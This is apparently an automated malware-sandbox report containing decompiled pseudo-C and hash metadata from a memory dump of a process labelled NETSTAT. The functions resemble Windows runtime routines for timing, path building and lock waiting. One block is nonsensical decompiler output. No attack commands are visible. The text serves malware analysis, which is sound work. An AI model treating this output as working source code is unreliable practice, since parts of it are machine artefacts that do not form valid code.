                                      					if(( *__ecx |  *_t50) != 0) {
                                      						 *__ecx = 0;
                                      						__ecx[1] = 0;
                                      						if(E02E87D50() != 0) {
                                      							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                      						} else {
                                      							_t65 = 0x7ffe0386;
                                      						}
                                      						if( *_t65 != 0) {
                                      							E02F38CD6(_t112);
                                      						}
                                      						_push(0);
                                      						_t52 = _t112 + 0x10; // 0x778df98b
                                      						_push( *_t52);
                                      						_t60 = E02EA9E20();
                                      					}
                                      					L20:
                                      					_pop(_t107);
                                      					_pop(_t113);
                                      					_pop(_t87);
                                      					return E02EAB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                      				}
                                      				_t8 = _t112 + 8; // 0x8b000cc2
                                      				_t67 =  *_t8;
                                      				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                      				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                      				_t108 =  *(_t67 + 0x14);
                                      				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                      				_t105 = 0x2710;
                                      				asm("sbb eax, edi");
                                      				_v44 = _t88;
                                      				_v52 = _t108;
                                      				_t60 = E02EACE00(_t97, _t68, 0x2710, 0);
                                      				_v56 = _t60;
                                      				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                      					L3:
                                      					 *(_t112 + 0x44) = _t60;
                                      					_t105 = _t60 * 0x2710 >> 0x20;
                                      					 *_t112 = _t88;
                                      					 *(_t112 + 4) = _t108;
                                      					_v20 = _t60 * 0x2710;
                                      					_v16 = _t60 * 0x2710 >> 0x20;
                                      					if(_v77 != 0) {
                                      						L16:
                                      						_v36 = _t88;
                                      						_v32 = _t108;
                                      						if(E02E87D50() != 0) {
                                      							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                      						} else {
                                      							_t73 = 0x7ffe0386;
                                      						}
                                      						if( *_t73 != 0) {
                                      							_t105 = _v40;
                                      							E02F38F6A(_t112, _v40, _t88, _t108);
                                      						}
                                      						_push( &_v28);
                                      						_push(0);
                                      						_push( &_v36);
                                      						_t48 = _t112 + 0x10; // 0x778df98b
                                      						_push( *_t48);
                                      						_t60 = E02EAAF60();
                                      						goto L20;
                                      					} else {
                                      						_t89 = 0x7ffe03b0;
                                      						do {
                                      							_t114 = 0x7ffe0010;
                                      							do {
                                      								_t77 =  *0x2f58628; // 0x0
                                      								_v68 = _t77;
                                      								_t78 =  *0x2f5862c; // 0x0
                                      								_v64 = _t78;
                                      								_v72 =  *_t89;
                                      								_v76 =  *((intOrPtr*)(_t89 + 4));
                                      								while(1) {
                                      									_t105 =  *0x7ffe000c;
                                      									_t100 =  *0x7ffe0008;
                                      									if(_t105 ==  *_t114) {
                                      										goto L8;
                                      									}
                                      									asm("pause");
                                      								}
                                      								L8:
                                      								_t89 = 0x7ffe03b0;
                                      								_t115 =  *0x7ffe03b0;
                                      								_t82 =  *0x7FFE03B4;
                                      								_v60 = _t115;
                                      								_t114 = 0x7ffe0010;
                                      								_v56 = _t82;
                                      							} while (_v72 != _t115 || _v76 != _t82);
                                      							_t83 =  *0x2f58628; // 0x0
                                      							_t116 =  *0x2f5862c; // 0x0
                                      							_v76 = _t116;
                                      							_t117 = _v68;
                                      						} while (_t117 != _t83 || _v64 != _v76);
                                      						asm("sbb edx, [esp+0x24]");
                                      						_t102 = _t100 - _v60 - _t117;
                                      						_t112 = _v48;
                                      						_t91 = _v44;
                                      						asm("sbb edx, eax");
                                      						_t130 = _t105 - _v52;
                                      						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                      							_t88 = _t102 - _t91;
                                      							asm("sbb edx, edi");
                                      							_t108 = _t105;
                                      						} else {
                                      							_t88 = 0;
                                      							_t108 = 0;
                                      						}
                                      						goto L16;
                                      					}
                                      				} else {
                                      					if( *(_t112 + 0x44) == _t60) {
                                      						goto L20;
                                      					}
                                      					goto L3;
                                      				}
                                      			}

















































                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02E8B9A5
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID:
                                      • API String ID: 885266447-0
                                      • Opcode ID: 4451c61eab96a7e7b9148203e0fa3355306763558bac279a12f52877ec74f2d9
                                      • Instruction ID: 7325043da8370f2bab5e4d7384700bb75518134e4d4dfde34a482b0d639140d6
                                      • Opcode Fuzzy Hash: 4451c61eab96a7e7b9148203e0fa3355306763558bac279a12f52877ec74f2d9
                                      • Instruction Fuzzy Hash: 34516971A48701CFC720EF28C490A2ABBE5BB88648F14996EF5D9C7344D770E844CB92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 83%
                                      			E02E92581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, void* _a1530200805, void* _a1546912485) {
                                      				signed int _v8;
                                      				signed int _v16;
                                      				unsigned int _v24;
                                      				void* _v28;
                                      				signed int _v32;
                                      				unsigned int _v36;
                                      				void* _v37;
                                      				signed int _v40;
                                      				signed int _v44;
                                      				signed int _v48;
                                      				signed int _v52;
                                      				signed int _v56;
                                      				intOrPtr _v60;
                                      				signed int _v64;
                                      				signed int _v68;
                                      				signed int _v72;
                                      				signed int _v76;
                                      				signed int _v80;
                                      				signed int _t232;
                                      				signed int _t236;
                                      				signed int _t243;
                                      				signed int _t245;
                                      				intOrPtr _t247;
                                      				signed int _t250;
                                      				signed int _t257;
                                      				signed int _t260;
                                      				signed int _t268;
                                      				signed int _t274;
                                      				signed int _t276;
                                      				void* _t281;
                                      				signed int _t282;
                                      				unsigned int _t285;
                                      				signed int _t289;
                                      				signed int _t294;
                                      				signed int _t298;
                                      				intOrPtr _t312;
                                      				signed int _t321;
                                      				signed int _t323;
                                      				signed int _t324;
                                      				signed int _t328;
                                      				signed int _t329;
                                      				signed int _t331;
                                      				signed int _t333;
                                      				signed int _t335;
                                      				void* _t336;
                                      
                                      				_t333 = _t335;
                                      				_t336 = _t335 - 0x4c;
                                      				_v8 =  *0x2f5d360 ^ _t333;
                                      				_push(__ebx);
                                      				_push(__esi);
                                      				_push(__edi);
                                      				_t328 = 0x2f5b2e8;
                                      				_v56 = _a4;
                                      				_v48 = __edx;
                                      				_v60 = __ecx;
                                      				_t285 = 0;
                                      				_v80 = 0;
                                      				asm("movsd");
                                      				_v64 = 0;
                                      				_v76 = 0;
                                      				_v72 = 0;
                                      				asm("movsd");
                                      				_v44 = 0;
                                      				_v52 = 0;
                                      				_v68 = 0;
                                      				asm("movsd");
                                      				_v32 = 0;
                                      				_v36 = 0;
                                      				asm("movsd");
                                      				_v16 = 0;
                                      				_t274 = 0x48;
                                      				_t308 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                                      				_t321 = 0;
                                      				_v37 = (_v24 >> 0x0000001c & 0x00000003) == 1;
                                      				if(_v48 <= 0) {
                                      					L16:
                                      					_t45 = _t274 - 0x48; // 0x0
                                      					__eflags = _t45 - 0xfffe;
                                      					if(_t45 > 0xfffe) {
                                      						_t329 = 0xc0000106;
                                      						goto L32;
                                      					} else {
                                      						_t328 = L02E84620(_t285,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t274);
                                      						_v52 = _t328;
                                      						__eflags = _t328;
                                      						if(_t328 == 0) {
                                      							_t329 = 0xc0000017;
                                      							goto L32;
                                      						} else {
                                      							 *(_t328 + 0x44) =  *(_t328 + 0x44) & 0x00000000;
                                      							_t50 = _t328 + 0x48; // 0x48
                                      							_t323 = _t50;
                                      							_t308 = _v32;
                                      							 *(_t328 + 0x3c) = _t274;
                                      							_t276 = 0;
                                      							 *((short*)(_t328 + 0x30)) = _v48;
                                      							__eflags = _t308;
                                      							if(_t308 != 0) {
                                      								 *(_t328 + 0x18) = _t323;
                                      								__eflags = _t308 - 0x2f58478;
                                      								 *_t328 = ((0 | _t308 == 0x02f58478) - 0x00000001 & 0xfffffffb) + 7;
                                      								E02EAF3E0(_t323,  *((intOrPtr*)(_t308 + 4)),  *_t308 & 0x0000ffff);
                                      								_t308 = _v32;
                                      								_t336 = _t336 + 0xc;
                                      								_t276 = 1;
                                      								__eflags = _a8;
                                      								_t323 = _t323 + (( *_t308 & 0x0000ffff) >> 1) * 2;
                                      								if(_a8 != 0) {
                                      									_t268 = E02EF39F2(_t323);
                                      									_t308 = _v32;
                                      									_t323 = _t268;
                                      								}
                                      							}
                                      							_t289 = 0;
                                      							_v16 = 0;
                                      							__eflags = _v48;
                                      							if(_v48 <= 0) {
                                      								L31:
                                      								_t329 = _v68;
                                      								__eflags = 0;
                                      								 *((short*)(_t323 - 2)) = 0;
                                      								goto L32;
                                      							} else {
                                      								_t274 = _t328 + _t276 * 4;
                                      								_v56 = _t274;
                                      								do {
                                      									__eflags = _t308;
                                      									if(_t308 != 0) {
                                      										_t232 =  *(_v60 + _t289 * 4);
                                      										__eflags = _t232;
                                      										if(_t232 == 0) {
                                      											goto L30;
                                      										} else {
                                      											__eflags = _t232 == 5;
                                      											if(_t232 == 5) {
                                      												goto L30;
                                      											} else {
                                      												goto L22;
                                      											}
                                      										}
                                      									} else {
                                      										L22:
                                      										 *_t274 =  *(_v60 + _t289 * 4);
                                      										 *(_t274 + 0x18) = _t323;
                                      										_t236 =  *(_v60 + _t289 * 4);
                                      										__eflags = _t236 - 8;
                                      										if(_t236 > 8) {
                                      											goto L56;
                                      										} else {
                                      											switch( *((intOrPtr*)(_t236 * 4 +  &M02E92959))) {
                                      												case 0:
                                      													__ax =  *0x2f58488;
                                      													__eflags = __ax;
                                      													if(__ax == 0) {
                                      														goto L29;
                                      													} else {
                                      														__ax & 0x0000ffff = E02EAF3E0(__edi,  *0x2f5848c, __ax & 0x0000ffff);
                                      														__eax =  *0x2f58488 & 0x0000ffff;
                                      														goto L26;
                                      													}
                                      													goto L108;
                                      												case 1:
                                      													L45:
                                      													E02EAF3E0(_t323, _v80, _v64);
                                      													_t263 = _v64;
                                      													goto L26;
                                      												case 2:
                                      													 *0x2f58480 & 0x0000ffff = E02EAF3E0(__edi,  *0x2f58484,  *0x2f58480 & 0x0000ffff);
                                      													__eax =  *0x2f58480 & 0x0000ffff;
                                      													__eax = ( *0x2f58480 & 0x0000ffff) >> 1;
                                      													__edi = __edi + __eax * 2;
                                      													goto L28;
                                      												case 3:
                                      													__eax = _v44;
                                      													__eflags = __eax;
                                      													if(__eax == 0) {
                                      														goto L29;
                                      													} else {
                                      														__esi = __eax + __eax;
                                      														__eax = E02EAF3E0(__edi, _v72, __esi);
                                      														__edi = __edi + __esi;
                                      														__esi = _v52;
                                      														goto L27;
                                      													}
                                      													goto L108;
                                      												case 4:
                                      													_push(0x2e);
                                      													_pop(__eax);
                                      													 *(__esi + 0x44) = __edi;
                                      													 *__edi = __ax;
                                      													__edi = __edi + 4;
                                      													_push(0x3b);
                                      													_pop(__eax);
                                      													 *(__edi - 2) = __ax;
                                      													goto L29;
                                      												case 5:
                                      													__eflags = _v36;
                                      													if(_v36 == 0) {
                                      														goto L45;
                                      													} else {
                                      														E02EAF3E0(_t323, _v76, _v36);
                                      														_t263 = _v36;
                                      													}
                                      													L26:
                                      													_t336 = _t336 + 0xc;
                                      													_t323 = _t323 + (_t263 >> 1) * 2 + 2;
                                      													__eflags = _t323;
                                      													L27:
                                      													_push(0x3b);
                                      													_pop(_t265);
                                      													 *((short*)(_t323 - 2)) = _t265;
                                      													goto L28;
                                      												case 6:
                                      													__ebx = "\\Wow\\Wow";
                                      													__eflags = __ebx - "\\Wow\\Wow";
                                      													if(__ebx != "\\Wow\\Wow") {
                                      														_push(0x3b);
                                      														_pop(__esi);
                                      														do {
                                      															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                      															E02EAF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                      															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                      															__edi = __edi + __eax * 2;
                                      															__edi = __edi + 2;
                                      															 *(__edi - 2) = __si;
                                      															__ebx =  *__ebx;
                                      															__eflags = __ebx - "\\Wow\\Wow";
                                      														} while (__ebx != "\\Wow\\Wow");
                                      														__esi = _v52;
                                      														__ecx = _v16;
                                      														__edx = _v32;
                                      													}
                                      													__ebx = _v56;
                                      													goto L29;
                                      												case 7:
                                      													 *0x2f58478 & 0x0000ffff = E02EAF3E0(__edi,  *0x2f5847c,  *0x2f58478 & 0x0000ffff);
                                      													__eax =  *0x2f58478 & 0x0000ffff;
                                      													__eax = ( *0x2f58478 & 0x0000ffff) >> 1;
                                      													__eflags = _a8;
                                      													__edi = __edi + __eax * 2;
                                      													if(_a8 != 0) {
                                      														__ecx = __edi;
                                      														__eax = E02EF39F2(__ecx);
                                      														__edi = __eax;
                                      													}
                                      													goto L28;
                                      												case 8:
                                      													__eax = 0;
                                      													 *(__edi - 2) = __ax;
                                      													 *0x2f56e58 & 0x0000ffff = E02EAF3E0(__edi,  *0x2f56e5c,  *0x2f56e58 & 0x0000ffff);
                                      													 *(__esi + 0x38) = __edi;
                                      													__eax =  *0x2f56e58 & 0x0000ffff;
                                      													__eax = ( *0x2f56e58 & 0x0000ffff) >> 1;
                                      													__edi = __edi + __eax * 2;
                                      													__edi = __edi + 2;
                                      													L28:
                                      													_t289 = _v16;
                                      													_t308 = _v32;
                                      													L29:
                                      													_t274 = _t274 + 4;
                                      													__eflags = _t274;
                                      													_v56 = _t274;
                                      													goto L30;
                                      											}
                                      										}
                                      									}
                                      									goto L108;
                                      									L30:
                                      									_t289 = _t289 + 1;
                                      									_v16 = _t289;
                                      									__eflags = _t289 - _v48;
                                      								} while (_t289 < _v48);
                                      								goto L31;
                                      							}
                                      						}
                                      					}
                                      				} else {
                                      					while(1) {
                                      						L1:
                                      						_t236 =  *(_v60 + _t321 * 4);
                                      						if(_t236 > 8) {
                                      							break;
                                      						}
                                      						switch( *((intOrPtr*)(_t236 * 4 +  &M02E92935))) {
                                      							case 0:
                                      								__ax =  *0x2f58488;
                                      								__eflags = __ax;
                                      								if(__ax != 0) {
                                      									__eax = __ax & 0x0000ffff;
                                      									__ebx = __ebx + 2;
                                      									__eflags = __ebx;
                                      									goto L53;
                                      								}
                                      								goto L14;
                                      							case 1:
                                      								L44:
                                      								_t308 =  &_v64;
                                      								_v80 = E02E92E3E(0,  &_v64);
                                      								_t274 = _t274 + _v64 + 2;
                                      								goto L13;
                                      							case 2:
                                      								__eax =  *0x2f58480 & 0x0000ffff;
                                      								__ebx = __ebx + __eax;
                                      								__eflags = __dl;
                                      								if(__dl != 0) {
                                      									__eax = 0x2f58480;
                                      									goto L80;
                                      								}
                                      								goto L14;
                                      							case 3:
                                      								__eax = E02E7EEF0(0x2f579a0);
                                      								__eax =  &_v44;
                                      								_push(__eax);
                                      								_push(0);
                                      								_push(0);
                                      								_push(4);
                                      								_push(L"PATH");
                                      								_push(0);
                                      								L57();
                                      								__esi = __eax;
                                      								_v68 = __esi;
                                      								__eflags = __esi - 0xc0000023;
                                      								if(__esi != 0xc0000023) {
                                      									L10:
                                      									__eax = E02E7EB70(__ecx, 0x2f579a0);
                                      									__eflags = __esi - 0xc0000100;
                                      									if(__esi == 0xc0000100) {
                                      										_v44 = _v44 & 0x00000000;
                                      										__eax = 0;
                                      										_v68 = 0;
                                      										goto L13;
                                      									} else {
                                      										__eflags = __esi;
                                      										if(__esi < 0) {
                                      											L32:
                                      											_t210 = _v72;
                                      											__eflags = _t210;
                                      											if(_t210 != 0) {
                                      												L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t210);
                                      											}
                                      											_t211 = _v52;
                                      											__eflags = _t211;
                                      											if(_t211 != 0) {
                                      												__eflags = _t329;
                                      												if(_t329 < 0) {
                                      													L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t211);
                                      													_t211 = 0;
                                      												}
                                      											}
                                      											goto L36;
                                      										} else {
                                      											__eax = _v44;
                                      											__ebx = __ebx + __eax * 2;
                                      											__ebx = __ebx + 2;
                                      											__eflags = __ebx;
                                      											L13:
                                      											_t285 = _v36;
                                      											goto L14;
                                      										}
                                      									}
                                      								} else {
                                      									__eax = _v44;
                                      									__ecx =  *0x2f57b9c; // 0x0
                                      									_v44 + _v44 =  *[fs:0x30];
                                      									__ecx = __ecx + 0x180000;
                                      									__eax = L02E84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                      									_v72 = __eax;
                                      									__eflags = __eax;
                                      									if(__eax == 0) {
                                      										__eax = E02E7EB70(__ecx, 0x2f579a0);
                                      										__eax = _v52;
                                      										L36:
                                      										_pop(_t322);
                                      										_pop(_t330);
                                      										__eflags = _v8 ^ _t333;
                                      										_pop(_t275);
                                      										return E02EAB640(_t211, _t275, _v8 ^ _t333, _t308, _t322, _t330);
                                      									} else {
                                      										__ecx =  &_v44;
                                      										_push(__ecx);
                                      										_push(_v44);
                                      										_push(__eax);
                                      										_push(4);
                                      										_push(L"PATH");
                                      										_push(0);
                                      										L57();
                                      										__esi = __eax;
                                      										_v68 = __eax;
                                      										goto L10;
                                      									}
                                      								}
                                      								goto L108;
                                      							case 4:
                                      								__ebx = __ebx + 4;
                                      								goto L14;
                                      							case 5:
                                      								_t270 = _v56;
                                      								if(_v56 != 0) {
                                      									_t308 =  &_v36;
                                      									_t272 = E02E92E3E(_t270,  &_v36);
                                      									_t285 = _v36;
                                      									_v76 = _t272;
                                      								}
                                      								if(_t285 == 0) {
                                      									goto L44;
                                      								} else {
                                      									_t274 = _t274 + 2 + _t285;
                                      								}
                                      								goto L14;
                                      							case 6:
                                      								__eax =  *0x2f55764 & 0x0000ffff;
                                      								goto L53;
                                      							case 7:
                                      								__eax =  *0x2f58478 & 0x0000ffff;
                                      								__ebx = __ebx + __eax;
                                      								__eflags = _a8;
                                      								if(_a8 != 0) {
                                      									__ebx = __ebx + 0x16;
                                      									__ebx = __ebx + __eax;
                                      								}
                                      								__eflags = __dl;
                                      								if(__dl != 0) {
                                      									__eax = 0x2f58478;
                                      									L80:
                                      									_v32 = __eax;
                                      								}
                                      								goto L14;
                                      							case 8:
                                      								__eax =  *0x2f56e58 & 0x0000ffff;
                                      								__eax = ( *0x2f56e58 & 0x0000ffff) + 2;
                                      								L53:
                                      								__ebx = __ebx + __eax;
                                      								L14:
                                      								_t321 = _t321 + 1;
                                      								if(_t321 >= _v48) {
                                      									goto L16;
                                      								} else {
                                      									_t308 = _v37;
                                      									goto L1;
                                      								}
                                      								goto L108;
                                      						}
                                      					}
                                      					L56:
                                      					asm("int 0x29");
                                      					asm("out 0x28, al");
                                      					goto 0xec118f3e;
                                      					asm("daa");
                                      					goto 0xec0f5746;
                                      					goto 0xec0f2e4e;
                                      					asm("in eax, dx");
                                      					asm("in eax, dx");
                                      					asm("daa");
                                      					goto 0xec11476a;
                                      					goto 0xec108672;
                                      					_t281 = 0x25;
                                      					asm("in eax, dx");
                                      					asm("in eax, dx");
                                      					asm("int3");
                                      					asm("int3");
                                      					asm("int3");
                                      					asm("int3");
                                      					asm("int3");
                                      					asm("int3");
                                      					asm("int3");
                                      					asm("int3");
                                      					asm("int3");
                                      					asm("int3");
                                      					asm("int3");
                                      					asm("int3");
                                      					asm("int3");
                                      					asm("int3");
                                      					asm("int3");
                                      					asm("int3");
                                      					asm("int3");
                                      					asm("int3");
                                      					_push(0x20);
                                      					_push(0x2f3ff00);
                                      					E02EBD08C(_t281, _t323, _t328);
                                      					_v44 =  *[fs:0x18];
                                      					_t324 = 0;
                                      					 *_a24 = 0;
                                      					_t282 = _a12;
                                      					__eflags = _t282;
                                      					if(_t282 == 0) {
                                      						_t243 = 0xc0000100;
                                      					} else {
                                      						_v8 = 0;
                                      						_t331 = 0xc0000100;
                                      						_v52 = 0xc0000100;
                                      						_t245 = 4;
                                      						while(1) {
                                      							_v40 = _t245;
                                      							__eflags = _t245;
                                      							if(_t245 == 0) {
                                      								break;
                                      							}
                                      							_t298 = _t245 * 0xc;
                                      							_v48 = _t298;
                                      							__eflags = _t282 -  *((intOrPtr*)(_t298 + 0x2e41664));
                                      							if(__eflags <= 0) {
                                      								if(__eflags == 0) {
                                      									_t260 = E02EAE5C0(_a8,  *((intOrPtr*)(_t298 + 0x2e41668)), _t282);
                                      									_t336 = _t336 + 0xc;
                                      									__eflags = _t260;
                                      									if(__eflags == 0) {
                                      										_t331 = E02EE51BE(_t282,  *((intOrPtr*)(_v48 + 0x2e4166c)), _a16, _t324, _t331, __eflags, _a20, _a24);
                                      										_v52 = _t331;
                                      										break;
                                      									} else {
                                      										_t245 = _v40;
                                      										goto L62;
                                      									}
                                      									goto L70;
                                      								} else {
                                      									L62:
                                      									_t245 = _t245 - 1;
                                      									continue;
                                      								}
                                      							}
                                      							break;
                                      						}
                                      						_v32 = _t331;
                                      						__eflags = _t331;
                                      						if(_t331 < 0) {
                                      							__eflags = _t331 - 0xc0000100;
                                      							if(_t331 == 0xc0000100) {
                                      								_t294 = _a4;
                                      								__eflags = _t294;
                                      								if(_t294 != 0) {
                                      									_v36 = _t294;
                                      									__eflags =  *_t294 - _t324;
                                      									if( *_t294 == _t324) {
                                      										_t331 = 0xc0000100;
                                      										goto L76;
                                      									} else {
                                      										_t312 =  *((intOrPtr*)(_v44 + 0x30));
                                      										_t247 =  *((intOrPtr*)(_t312 + 0x10));
                                      										__eflags =  *((intOrPtr*)(_t247 + 0x48)) - _t294;
                                      										if( *((intOrPtr*)(_t247 + 0x48)) == _t294) {
                                      											__eflags =  *(_t312 + 0x1c);
                                      											if( *(_t312 + 0x1c) == 0) {
                                      												L106:
                                      												_t331 = E02E92AE4( &_v36, _a8, _t282, _a16, _a20, _a24);
                                      												_v32 = _t331;
                                      												__eflags = _t331 - 0xc0000100;
                                      												if(_t331 != 0xc0000100) {
                                      													goto L69;
                                      												} else {
                                      													_t324 = 1;
                                      													_t294 = _v36;
                                      													goto L75;
                                      												}
                                      											} else {
                                      												_t250 = E02E76600( *(_t312 + 0x1c));
                                      												__eflags = _t250;
                                      												if(_t250 != 0) {
                                      													goto L106;
                                      												} else {
                                      													_t294 = _a4;
                                      													goto L75;
                                      												}
                                      											}
                                      										} else {
                                      											L75:
                                      											_t331 = E02E92C50(_t294, _a8, _t282, _a16, _a20, _a24, _t324);
                                      											L76:
                                      											_v32 = _t331;
                                      											goto L69;
                                      										}
                                      									}
                                      									goto L108;
                                      								} else {
                                      									E02E7EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                      									_v8 = 1;
                                      									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                      									_t331 = _a24;
                                      									_t257 = E02E92AE4( &_v36, _a8, _t282, _a16, _a20, _t331);
                                      									_v32 = _t257;
                                      									__eflags = _t257 - 0xc0000100;
                                      									if(_t257 == 0xc0000100) {
                                      										_v32 = E02E92C50(_v36, _a8, _t282, _a16, _a20, _t331, 1);
                                      									}
                                      									_v8 = _t324;
                                      									E02E92ACB();
                                      								}
                                      							}
                                      						}
                                      						L69:
                                      						_v8 = 0xfffffffe;
                                      						_t243 = _t331;
                                      					}
                                      					L70:
                                      					return E02EBD0D1(_t243);
                                      				}
                                      				L108:
                                      			}
















































                                      0x02e92a09
                                      0x02e92a0e
                                      0x02e92a21
                                      0x02e92a24
                                      0x02e92a35
                                      0x02e92a3a
                                      0x02e92a3d
                                      0x02e92a42
                                      0x02e92a59
                                      0x02e92a59
                                      0x02e92a5c
                                      0x02e92a5f
                                      0x02e92a5f
                                      0x02e929fa
                                      0x02e929f3
                                      0x02e92a64
                                      0x02e92a64
                                      0x02e92a6b
                                      0x02e92a6b
                                      0x02e92a6d
                                      0x02e92a72
                                      0x02e92a72
                                      0x00000000

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: PATH
                                      • API String ID: 0-1036084923
                                      • Opcode ID: 35adb0eb3d56aabba80d230fade28e7f2615e2867d34ba067fa96f9a603a777e
                                      • Instruction ID: 035a2fa03768706c10679d8a1a4d6cd54f6a8f41d39a7c9758ecfe284dde659e
                                      • Opcode Fuzzy Hash: 35adb0eb3d56aabba80d230fade28e7f2615e2867d34ba067fa96f9a603a777e
                                      • Instruction Fuzzy Hash: 53C17CB5D80219AFCF25DF98D890BEEB7B5FF48744F44902AEA01BB250D735A941CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 63%
                                      			E02E62D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                      				signed char _v8;
                                      				signed int _v12;
                                      				signed int _v16;
                                      				signed int _v20;
                                      				signed int _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				signed int _v52;
                                      				void* __esi;
                                      				void* __ebp;
                                      				intOrPtr _t55;
                                      				signed int _t57;
                                      				signed int _t58;
                                      				char* _t62;
                                      				signed char* _t63;
                                      				signed char* _t64;
                                      				signed int _t67;
                                      				signed int _t72;
                                      				signed int _t77;
                                      				signed int _t78;
                                      				signed int _t88;
                                      				intOrPtr _t89;
                                      				signed char _t93;
                                      				signed int _t97;
                                      				signed int _t98;
                                      				signed int _t102;
                                      				signed int _t103;
                                      				intOrPtr _t104;
                                      				signed int _t105;
                                      				signed int _t106;
                                      				signed char _t109;
                                      				signed int _t111;
                                      				void* _t116;
                                      
                                      				_t102 = __edi;
                                      				_t97 = __edx;
                                      				_v12 = _v12 & 0x00000000;
                                      				_t55 =  *[fs:0x18];
                                      				_t109 = __ecx;
                                      				_v8 = __edx;
                                      				_t86 = 0;
                                      				_v32 = _t55;
                                      				_v24 = 0;
                                      				_push(__edi);
                                      				if(__ecx == 0x2f55350) {
                                      					_t86 = 1;
                                      					_v24 = 1;
                                      					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                      				}
                                      				_t103 = _t102 | 0xffffffff;
                                      				if( *0x2f57bc8 != 0) {
                                      					_push(0xc000004b);
                                      					_push(_t103);
                                      					E02EA97C0();
                                      				}
                                      				if( *0x2f579c4 != 0) {
                                      					_t57 = 0;
                                      				} else {
                                      					_t57 = 0x2f579c8;
                                      				}
                                      				_v16 = _t57;
                                      				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                      					_t93 = _t109;
                                      					L23();
                                      				}
                                      				_t58 =  *_t109;
                                      				if(_t58 == _t103) {
                                      					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                      					_t58 = _t103;
                                      					if(__eflags == 0) {
                                      						_t93 = _t109;
                                      						E02E91624(_t86, __eflags);
                                      						_t58 =  *_t109;
                                      					}
                                      				}
                                      				_v20 = _v20 & 0x00000000;
                                      				if(_t58 != _t103) {
                                      					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                      				}
                                      				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                      				_t88 = _v16;
                                      				_v28 = _t104;
                                      				L9:
                                      				while(1) {
                                      					if(E02E87D50() != 0) {
                                      						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                      					} else {
                                      						_t62 = 0x7ffe0382;
                                      					}
                                      					if( *_t62 != 0) {
                                      						_t63 =  *[fs:0x30];
                                      						__eflags = _t63[0x240] & 0x00000002;
                                      						if((_t63[0x240] & 0x00000002) != 0) {
                                      							_t93 = _t109;
                                      							E02EFFE87(_t93);
                                      						}
                                      					}
                                      					if(_t104 != 0xffffffff) {
                                      						_push(_t88);
                                      						_push(0);
                                      						_push(_t104);
                                      						_t64 = E02EA9520();
                                      						goto L15;
                                      					} else {
                                      						while(1) {
                                      							_t97 =  &_v8;
                                      							_t64 = E02E9E18B(_t109 + 4, _t97, 4, _t88, 0);
                                      							if(_t64 == 0x102) {
                                      								break;
                                      							}
                                      							_t93 =  *(_t109 + 4);
                                      							_v8 = _t93;
                                      							if((_t93 & 0x00000002) != 0) {
                                      								continue;
                                      							}
                                      							L15:
                                      							if(_t64 == 0x102) {
                                      								break;
                                      							}
                                      							_t89 = _v24;
                                      							if(_t64 < 0) {
                                      								L02EBDF30(_t93, _t97, _t64);
                                      								_push(_t93);
                                      								_t98 = _t97 | 0xffffffff;
                                      								__eflags =  *0x2f56901;
                                      								_push(_t109);
                                      								_v52 = _t98;
                                      								if( *0x2f56901 != 0) {
                                      									_push(0);
                                      									_push(1);
                                      									_push(0);
                                      									_push(0x100003);
                                      									_push( &_v12);
                                      									_t72 = E02EA9980();
                                      									__eflags = _t72;
                                      									if(_t72 < 0) {
                                      										_v12 = _t98 | 0xffffffff;
                                      									}
                                      								}
                                      								asm("lock cmpxchg [ecx], edx");
                                      								_t111 = 0;
                                      								__eflags = 0;
